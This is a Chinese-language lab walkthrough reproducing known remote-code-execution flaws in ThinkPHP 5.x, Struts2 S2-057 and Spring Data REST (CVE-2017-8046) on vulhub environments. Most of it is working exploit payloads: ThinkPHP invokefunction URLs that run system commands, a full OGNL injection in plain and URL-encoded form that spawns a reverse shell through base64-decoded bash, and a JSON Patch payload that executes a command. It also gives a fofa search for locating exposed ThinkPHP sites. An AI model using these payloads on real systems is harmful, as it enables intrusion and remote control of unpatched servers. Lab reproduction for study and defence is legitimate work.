ThinkPHP5x，struts2等框架靶场复现-EW帮帮网

Thinkphp

Thinkphp5x远程命令执行及getshell

首先我们先找一个环境，或者自己搭建一个环境

fofa：body="ThinkPHP V5"

搭建：vulhub/thinkphp/5-rce
docker-compose up -d

然后去访问我们的环境

远程命令执行

/?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

远程代码执行

/?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1

struts2

S2-057远程执行代码漏洞

环境依旧采用vulhub搭建

vulhub靶场 /struts2/s2-057

首先我们先搭建好我们的环境

我们再网址后拼接，并访问

/struts2-showcase/${(123+123)}/actionChain1.action

可以发现两个数字相加了，那么我们就可以利用中间来执行代码操作,反弹shell

首先开启监听

然后将中间替换为我们的地址

${
(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#ct=#request['struts.valueStack'].context).(#cr=#ct['com.opensymphony.xwork2.ActionContext.container']).(#ou=#cr.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ou.getExcludedPackageNames().clear()).(#ou.getExcludedClasses().clear()).(#ct.setMemberAccess(#dm)).(#a=@java.lang.Runtime@getRuntime().exec('bash -c {echo,反弹shell命令的base64编码}|{base64,-d}|{bash,-i}')).(@org.apache.commons.io.IOUtils@toString(#a.getInputStream()))}
url编码--->
/%24{%0A(%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS).(%23ct%3D%23request['struts.valueStack'].context).(%23cr%3D%23ct['com.opensymphony.xwork2.ActionContext.container']).(%23ou%3D%23cr.getInstance(%40com.opensymphony.xwork2.ognl.OgnlUtil%40class)).(%23ou.getExcludedPackageNames().clear()).(%23ou.getExcludedClasses().clear()).(%23ct.setMemberAccess(%23dm)).(%23a%3D%40java.lang.Runtime%40getRuntime().exec('bash -c {echo反弹shell命令的base64编码的url编码}|{base64%2C-d}|{bash%2C-i}')).(%40org.apache.commons.io.IOUtils%40toString(%23a.getInputStream()))}

然后即可反弹到shell

Spring

Spring Data Rest 远程命令执行命令(CVE-2017-8046)

搭建环境

vulhub靶场 /spring/CVE-2017-8046

访问我们的环境，出现这个页面即为搭建成功

然后开启抓包，刷新一下页面进行抓包，修改一下我们的请求方式和请求内容

[{ "op": "replace","path": "T(java.lang.Runtime).getRuntime().exec(new java.lang.String(newbyte[]{116,111,117,99,104,32,47,116,109,112,47,115,117,99,99,101,115,115}))/lastname","value":"vulhub" }]